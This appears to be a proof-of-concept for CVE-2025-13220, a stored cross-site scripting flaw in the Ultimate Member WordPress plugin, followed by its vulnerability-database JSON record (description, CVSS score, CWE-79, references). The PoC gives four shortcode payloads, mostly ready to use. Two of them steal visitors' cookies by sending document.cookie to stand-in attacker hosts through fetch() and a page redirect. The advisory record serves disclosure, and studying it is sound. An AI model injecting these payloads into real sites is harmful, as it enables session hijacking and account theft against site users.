CVE-2025-13220

<!-- WordPress Ultimate Member Stored XSS PoC --> <!-- Author: Contributor+ level authenticated user --> <!-- Method 1: Using shortcode with event handler --> [ultimatemember_profile user_id="1" onerror="alert(document.cookie)"] <!-- Method 2: Using javascript: protocol in shortcode attribute --> [ultimatemember_button text="Click me" link="javascript:alert('XSS')"] <!-- Method 3: Image tag with onerror in profile field --> [ultimatemember_field id="user_avatar" alt='" onerror="fetch(\'https://attacker.com/log?c=\'+document.cookie)"'] <!-- Method 4: Stored XSS via form shortcode --> [ultimatemember form_id="123" template_id="<img src=x onerror=document.location='https://evil.com/steal.php?cookie='+document.cookie>"]

{"cve": {"id": "CVE-2025-13220", "sourceIdentifier": "[email protected]", "published": "2025-12-21T04:16:04.180", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode attributes in all versions up to, and including, 2.11.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-shortcodes.php#L525", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-shortcodes.php#L542", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-shortcodes.php#L558", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-shortcodes.php#L591", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-shortcodes.php#L625", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.10.6/includes/core/class-shortcodes.php#L67", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3421362%40ultimate-member&new=3421362%40ultimate-member&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b4c06548-238d-4b75-8f20-d7de6fc21539?source=cve", "source": "[email protected]"}]}}